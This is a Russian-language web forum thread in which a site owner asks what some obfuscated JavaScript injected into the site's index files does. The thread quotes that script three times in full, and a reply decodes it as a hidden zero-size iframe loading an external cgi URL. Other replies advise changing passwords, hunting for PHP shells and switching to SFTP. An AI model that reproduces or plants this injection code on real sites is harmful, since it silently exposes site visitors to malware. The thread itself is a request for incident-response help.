Мне установили вредоносный Java Script на index файлы

Статус
В этой теме нельзя размещать новые ответы.

Toha20072008

Профессор
Регистрация
17 Фев 2008
Сообщения
314
Реакции
48
  • Автор темы
  • Заблокирован
  • #1
Мне на сайт установили какой-то непонятный Java Script на index файлы сайта. На все разделы вкоторых есть файлы index.php и index.html - сейчас не важно то как они это сделали.

Главный вопрос зачем это было нужно. Что делает этот код - который я приведу ниже.
Код:
<script>function OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01){var II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO=I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.length,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O=1024,l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l,IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O,O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0,II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO=0,l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=0,O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O=0,IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI=Array(63,3,50,51,57,55,35,16,27,21,0,0,0,0,0,0,14,44,60,13,22,19,43,37,30,23,59,53,49,31,56,9,29,12,45,18,7,8,42,38,6,34,17,0,0,0,0,52,0,4,39,28,40,41,0,46,48,1,47,2,10,54,5,58,36,25,26,61,15,32,33,24,62,20,11);for(IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O=Math.ceil(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO/lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O>0;IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O--){O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0=\'\';for(l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l=Math.min(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l>0;l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l--,II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO--){O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O|=(IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI[I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.charCodeAt(II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO++)-48])<<l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII;if(l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII){O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0+=String.fromCharCode(165^O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O&255);O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O>>=8;l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII-=2}else{l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=6}}document.write(O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0)}}OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(\"q2BhIEQ2fIdKI8QWTmc_ZIsblVNKlFB2DjdLzFdKl2B2zrAhQFqhftQL7bc_TDd_QTc_C64v9HwvC1Q3k5c_wHwGTDdKZ3P2f64vi3AK9bQLc042ljQhTgqWl2BhIEQ2fjO\")</script><script>function OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01){var II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO=I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.length,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O=1024,l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l,IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O,O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0,II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO=0,l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=0,O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O=0,IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI=Array(63,3,50,51,57,55,35,16,27,21,0,0,0,0,0,0,14,44,60,13,22,19,43,37,30,23,59,53,49,31,56,9,29,12,45,18,7,8,42,38,6,34,17,0,0,0,0,52,0,4,39,28,40,41,0,46,48,1,47,2,10,54,5,58,36,25,26,61,15,32,33,24,62,20,11);for(IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O=Math.ceil(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO/lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O>0;IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O--){O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0=\'\';for(l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l=Math.min(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l>0;l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l--,II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO--){O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O|=(IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI[I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.charCodeAt(II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO++)-48])<<l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII;if(l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII){O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0+=String.fromCharCode(165^O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O&255);O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O>>=8;l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII-=2}else{l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=6}}document.write(O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0)}}OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(\"q2BhIEQ2fIdKI8QWTmc_ZIsblVNKlFB2DjdLzFdKl2B2zrAhQFqhftQL7bc_TDd_QTc_C64v9HwvC1Q3k5c_wHwGTDdKZ3P2f64vi3AK9bQLc042ljQhTgqWl2BhIEQ2fjO\")</script><script>function OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01){var II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO=I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.length,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O=1024,l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l,IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O,O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0,II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO=0,l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=0,O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O=0,IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI=Array(63,3,50,51,57,55,35,16,27,21,0,0,0,0,0,0,14,44,60,13,22,19,43,37,30,23,59,53,49,31,56,9,29,12,45,18,7,8,42,38,6,34,17,0,0,0,0,52,0,4,39,28,40,41,0,46,48,1,47,2,10,54,5,58,36,25,26,61,15,32,33,24,62,20,11);for(IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O=Math.ceil(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO/lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O>0;IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O--){O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0=\'\';for(l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l=Math.min(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l>0;l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l--,II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO--){O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O|=(IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI[I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.charCodeAt(II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO++)-48])<<l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII;if(l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII){O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0+=String.fromCharCode(165^O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O&255);O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O>>=8;l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII-=2}else{l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=6}}document.write(O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0)}}OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(\"q2BhIEQ2fIdKI8QWTmc_ZIsblVNKlFB2DjdLzFdKl2B2zrAhQFqhftQL7bc_TDd_QTc_C64v9HwvC1Q3k5c_wHwGTDdKZ3P2f64vi3AK9bQLc042ljQhTgqWl2BhIEQ2fjO\")</script>
 

tostrss

Мой дом здесь!
Регистрация
16 Окт 2007
Сообщения
768
Реакции
219
<iframe src="http://roons.cn/s/in.cgi?default" width="0" height="0" style="display:none"></iframe>



меняй пароли, у тебя сидит вирус, через фтп-ифреймер зафреймили твои скрипты.
 

Toha20072008

Профессор
Регистрация
17 Фев 2008
Сообщения
314
Реакции
48
  • Автор темы
  • Заблокирован
  • #3
меняй пароли, у тебя сидит вирус, через фтп-ифреймер зафреймили твои скрипты.

Первое что сделал это поменял все пароли.

А зачем они это делают - чтобы получит контроль над сайтом и получить ФТП пароли?
 

ask0n

Гуру форума
Регистрация
9 Июн 2009
Сообщения
218
Реакции
62
А зачем они это делают - чтобы получит контроль над сайтом и получить ФТП пароли?
Если они смогли внедрять код в твой индекс, то контроль над сайтом уже получен, теперь через твой сайт будут еще кому-то внедрять или уже внедрили...
 

Toha20072008

Профессор
Регистрация
17 Фев 2008
Сообщения
314
Реакции
48
  • Автор темы
  • Заблокирован
  • #5
Если они смогли внедрять код в твой индекс, то контроль над сайтом уже получен, теперь через твой сайт будут еще кому-то внедрять или уже внедрили...

Даже если я поменял пароли на ФТП и на все что можно было ??:eek:

А как расшифровать этот скрипт который они мне установили??:(
 

ask0n

Гуру форума
Регистрация
9 Июн 2009
Сообщения
218
Реакции
62
Даже если я поменял пароли на ФТП и на все что можно было ??:eek:
Могли остаться php-шеллы. Нужно понять как был получен доступ, возможно есть уязвимость в движке, возможно у тебя на компе троян уже живет...

А как расшифровать этот скрипт который они мне установили??:(
Для просмотра ссылки Войди или Зарегистрируйся
 

Toha20072008

Профессор
Регистрация
17 Фев 2008
Сообщения
314
Реакции
48
  • Автор темы
  • Заблокирован
  • #8
Могли остаться php-шеллы. Нужно понять как был получен доступ, возможно есть уязвимость в движке, возможно у тебя на компе троян уже живет...


Для просмотра ссылки Войди или Зарегистрируйся


А как избавиться от PHP шелов - их по ФТП протоколу видно? Можно их удалить?
 

tostrss

Мой дом здесь!
Регистрация
16 Окт 2007
Сообщения
768
Реакции
219
ты файлы своего сайта знаешь? проверь их. если есть лишние, то удаляй.
 

admLoki

генератор случайного PHP
Регистрация
14 Сен 2006
Сообщения
481
Реакции
104
sFTP надо использовать и мозг не трахать.
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху